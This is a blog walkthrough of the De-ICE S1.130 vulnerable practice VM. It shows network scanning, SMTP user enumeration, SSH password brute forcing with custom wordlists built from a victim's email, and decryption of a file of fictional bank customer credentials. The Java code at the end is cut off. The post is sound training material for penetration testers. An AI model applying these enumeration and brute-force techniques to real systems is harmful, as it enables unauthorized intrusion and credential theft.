While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. This one was short and sweet, not to many flags to deal with. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
SE-ICE S1.130
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.130.iso
Default IP: Not so fast buddy, that is one of the flags
Flags:
1. Find default IP for system
2. Obtain access to the file system
3. Final Flag: Obtain the new user accounts bank information
Spoilers and Walkthrough
Port scan the image to get started. At this point I was having everyone do this through the metasploit console instead of stand alone.
msfconsole workspace deice db_nmap -sS -F -T4 --exclude 192.168.1.128 192.168.1.0/24
You will need to exclude your own IP, 192.168.1.128 is mine. If you are running any other known systems on your network add them to the exclude with a comma to separate the list.
msf > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.1.1 00:50:56:c0:00:08 Unknown device 192.168.1.2 00:50:56:e6:1d:4b Unknown device 192.168.1.20 00:0c:29:a4:37:1e Unknown device 192.168.1.123 00:0c:29:a4:37:1e slax Linux 2.6.X server
.1 and .2 are the VMWare NAT. You can check those but trust me. .123 is a different De-ICE LiveCD that is included in the same database because I’m lazy. Looks like 192.168.1.20 is the one.
netdiscover is another tool that looks for ARP requests to discover live hosts. While it isn’t integrated into metasploit I’ve used it on penetration tests to locate hosts for zero knowledge internal tests.
netdiscover Currently scanning: 192.168.66.0/16 | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.1 00:50:56:c0:00:08 1 60 Unknown vendor 192.168.1.2 00:50:56:e7:84:3f 1 60 Unknown vendor 192.168.1.20 00:0c:29:1f:c6:f0 1 60 Unknown vendor 192.168.1.254 00:50:56:f9:37:34 1 60 Unknown vendor
The -sV and -O combination is the same as -A but I’ve separated it out just to have this line of text to tell you that. When I originally did these walkthrough the notes because progressively less detailed since the small group was getting better each week. Since these are now stand alone I will add a little more detail hence the time mismatch.
msf > db_nmap -sV -O -F 192.168.1.20 [*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-06 00:08 EDT [*] Nmap: Nmap scan report for 192.168.1.20 [*] Nmap: Host is up (0.00058s latency). [*] Nmap: Not shown: 93 filtered ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 21/tcp open ftp vsftpd 2.0.4 [*] Nmap: 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) [*] Nmap: 25/tcp open smtp Sendmail 8.13.7/8.13.7 [*] Nmap: 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) [*] Nmap: 110/tcp open pop3 Openwall popa3d [*] Nmap: 143/tcp open imap UW imapd 2004.357 [*] Nmap: 443/tcp closed https [*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware) [*] Nmap: Device type: general purpose [*] Nmap: Running: Linux 2.6.X [*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6 [*] Nmap: OS details: Linux 2.6.13 - 2.6.32 [*] Nmap: Network Distance: 1 hop [*] Nmap: Service Info: Host: slax.example.net; OS: Unix [*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds
In a normal penetration test, if this was the only host in scope, I would dig through the FTP and HTTP sites for data in parallel to performing vulnerability identification. We have used the Nikto web vulnerability scanner in the past and will use it again for this test. Nikto uses a custom User Agent string Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID). This can be changed in the /etc/nikto.conf file or the scan can be piped through the Burp proxy and used to change the User Agent. Most network security appliances and hardened web servers will not give good results to Nikto scans since it is known bad traffic.
nikto -h 192.168.1.20
http://192.168.1.20/info.php has good info. The /info.php page is good on any test and will usually be a finding in the penetration test report.
Logging into the FTP site as anonymous throws an error so no viable path there.
Connected to 192.168.1.20. 220 (vsFTPd 2.0.4) Name (192.168.1.20:root): anonymous 230 Login successful. ftp> ls 215 UNIX Type: L8 500 OOPS: vsf_sysutil_recv_peek
In parallel start a password attack on SSH using rockyou and root. See the S1.100 Tutorial for info on how to set it up. While the brute force attack runs, lets look at some other low hanging fruit.
Lets start by looking at the SMTP server.
use auxiliary/scanner/smtp/smtp_enum
The SMTP server pops back some good info, lets follow that rabbit hole down. We have one possible username from the website (customerserviceadmin@nosecbank.com). Lets build out a list for potential attacks.
customerserviceadmin |
---|
customeradmin |
csadmin |
adm |
bin |
daemon |
dbadmin |
ftp |
gdm |
operator |
postmaster |
sysadmin |
webmaster |
After some time passes you should return a password. I used xHydra so show the GUI interface but any password cracking tool will work.
[DATA] attacking service ssh on port 22 [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://192.168.1.20:22 [INFO] Successful, password authentication is supported by ssh://192.168.1.20:22 [22][ssh] host: 192.168.1.20 login: csadmin password: rocker
SSH to the server using ssh csadmin@192.168.1.20 and rifle through the file system.
csadmin@192.168.1.20's password: Linux 2.6.16. csadmin@slax:~$ ls mailserv_download/ csadmin@slax:~$ cd mailserv_download/ csadmin@slax:~/mailserv_download$ ls 2010122014234.j12Gqo4H049241 2010122216451.f81Ltw4R010211.part2
Multiple file names … part2 … better figure that out next. Maybe, I can just read the text part with cat.
csadmin@slax:~/mailserv_download$ cat * To: csadmin@nosecbank.com CC: Subject: My Son's Birthday Date: Mon, 20 Dec 2010 14:23:46 +0500 Return-Path: <sdadmin@nosecbank.com> Delivered-To: csadmin:nosecbank.com@nosecbank.com Received: (qmail 20281 invoked from network); 20 Dec 2010 09:23:46 -0000 X-Received: from network (192.168.1.123) by mailserv1-3.us6.service.com; 20 Dec 2010 09:23:46 -0000 Received: from www.nosecbank.com (unknown [198.65.139.34]) by srv5.us6.service.com (Postfix) with ESMTP id D98402459DD for <csadmin@nosecbank.com>; Mon, 20 Dec 2010 09:23:46 +0000 (GMT) Message-Id: <2010122014234.j12Gqo4H049241@www.nosecbank.com> Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="---=_NextPart_000_0000_02F24S11.FEPQRE80" X-Mailer: K-Mail; Build 1.0.5510 Thread-Index: Qw2cWVmE3odZs3TqTTqFvS1e3lexms== Message: Hey Mark, I am curious if you would be free to come over and visit for my son Donovin's birthday tomorrow after work. I would also appreciate if you brought Andy with you as well, because Donny really enjoyed playing with him last time he was over. I know its short notice but he is turning 12 and it is special for both him and me. Let me know if this works. Thanks! -Paul ///////////////------ ERROR: MESSAGE CORRUPTED -------/////////////// ///////////////------ ERROR: MESSAGE CORRUPTED -------/////////////// ///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
Lets build a second attack based on the content of that email.
Username sdadmin Passwords donovin Donovin donovin21 Donovin21 donovin98 Donovin98 donovin1221 Donovin1221 donovin122198 Donovin122198 donovin12211998 Donovin12211998 donovin211998 Donovin211998 donovin1998 Donovin1998
Second verse same as the first. From checking the home folder you know that Fred is the databaser. As a life pro tip, don’t trust people like Fred.
dbadmin
databaser Databaser databaser1 databaser2 databaser3 databaser4 databaser5 databaser6 databaser7 databaser8 databaser9 databaser0 databaser! databaser@ databaser# databaser$ databaser% databaser^ databaser& databaser* databaser( databaser) Databaser1 Databaser2 Databaser3 Databaser4 Databaser5 Databaser6 Databaser7 Databaser8 Databaser9 Databaser0 Databaser! Databaser@ Databaser# Databaser$ Databaser% Databaser^ Databaser& Databaser* Databaser( Databaser) databaser10 databaser11 databaser12 databaser13 databaser14 databaser15 databaser16 databaser17 databaser18 databaser19 databaser20 databaser21 databaser22 databaser23 databaser24 databaser25 databaser26 databaser27 databaser28 databaser29 databaser30 databaser31 databaser32 databaser33 databaser34 databaser35 databaser36 databaser37 databaser38 databaser39 databaser40 databaser41 databaser42 databaser43 databaser44 databaser45 databaser46 databaser47 databaser48 databaser49 databaser50 databaser51 databaser52 databaser53 databaser54 databaser55 databaser56 databaser57 databaser58 databaser59 databaser60 databaser61 databaser62 databaser63 databaser64 databaser65 databaser66 databaser67 databaser68 databaser69 databaser70 databaser71 databaser72 databaser73 databaser74 databaser75 databaser76 databaser77 databaser78 databaser79 databaser80 databaser81 databaser82 databaser83 databaser84 databaser85 databaser86 databaser87 databaser88 databaser89 databaser90 databaser91 databaser92 databaser93 databaser94 databaser95 databaser96 databaser97 databaser98 databaser99 Databaser10 Databaser11 Databaser12 Databaser13 Databaser14 Databaser15 Databaser16 Databaser17 Databaser18 Databaser19 Databaser20 Databaser21 Databaser22 Databaser23 Databaser24 Databaser25 Databaser26 Databaser27 Databaser28 Databaser29 Databaser30 Databaser31 Databaser32 Databaser33 Databaser34 Databaser35 Databaser36 Databaser37 Databaser38 Databaser39 Databaser40 Databaser41 Databaser42 Databaser43 Databaser44 Databaser45 Databaser46 Databaser47 Databaser48 Databaser49 Databaser50 Databaser51 Databaser52 Databaser53 Databaser54 Databaser55 Databaser56 Databaser57 Databaser58 Databaser59 Databaser60 Databaser61 Databaser62 Databaser63 Databaser64 Databaser65 Databaser66 Databaser67 Databaser68 Databaser69 Databaser70 Databaser71 Databaser72 Databaser73 Databaser74 Databaser75 Databaser76 Databaser77 Databaser78 Databaser79 Databaser80 Databaser81 Databaser82 Databaser83 Databaser84 Databaser85 Databaser86 Databaser87 Databaser88 Databaser89 Databaser90 Databaser91 Databaser92 Databaser93 Databaser94 Databaser95 Databaser96 Databaser97 Databaser98 Databaser99
Hey look .part1 lets put all that together. I had to cook this part from another walkthrough because java programming is not my forte. The code can be found at the bottom of this post, I named the file Decoder.java but you can be as creative as you want.
javac Decoder.java java Decoder sysadmin java Decoder root
Once you find this file (useracc_update.csv.enc) try the openssl decryption similar to earlier de-ice challenges. Hint look in the sysadmin profile.
root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in useracc_update.csv.enc -out useracc_update.csv enter aes-128-cbc decryption password: bad decrypt 25228:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461: root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv enter aes-256-cbc decryption password: bad decrypt 25311:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461: root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv -k 31/Fwxw+2 root@slax:/home/ftp/incoming# cat user useracc_update.csv useracc_update.csv.enc root@slax:/home/ftp/incoming# cat useracc_update.csv ID,Last,First,Email,State,Username,Password,Verifacation Code,Pin code 1000,Carr,Alfred,acarr23@gmail.com,NY,acarr9096,phantom4,952733,490 1001,Karson,William,wkarson53@yahoo.com,NY,wkarson2431,rockallday123,567094,345 1002,Wheeler,Cordy,megawheels98@rocketmail.com,NY,cwheeler5031,goeagles90,462724,631 1003,Smith,Ken,synthesizer_1r@gmail.com,NY,ksmith6253,crystalization,636721,353 1004,Quinn,Cynthia,qcq92@aol.com,NY,cquinn1217,archyandhenry,680247,223 1005,Floyd,Wilson,jukeboxer_4life@gmail.com,NY,wfloyd5931,knockout66,521456,441 1006,Blake,Markus,sil3nt_gunn3r@yahoo.com,NY,mblake6947,268768924,129632,557 1007,Nash,Jillian,wiselife141@aol.com,NY,jnash0934,checkitout1,324672,315 1008,Atkins,Alison,double_a44@hotmail.com,NY,aatkins9087,gogogo123123,457094,124 1009,Oliver,Frank,fog_of_war0001@gmail.com,NY,foliver9385,falconpunch,783143,134 1010,Jones,Edith,msjones677@hotmail.com,NY,ejones7532,chris12345,632620,579 1011,Moore,Cody,aiprojectx@gmail.com,NY,dot_Cipher,crypTrace,101010,1337
That is the last flag, this challenge was personally tough because of all the Java code and encryption involved which aren’t in my normal day to day penetration tests.
import java.io.*; public class deice { public static void main(String[] args) { try { System.out.println("[*] Password Generator"); BufferedReader in=new BufferedReader(new InputStreamReader(System.in)); System.out.print("[?] Username: "); String input=in.readLine(); int[] output=processLoop(input); String outputASCII=""; for(int i=0; i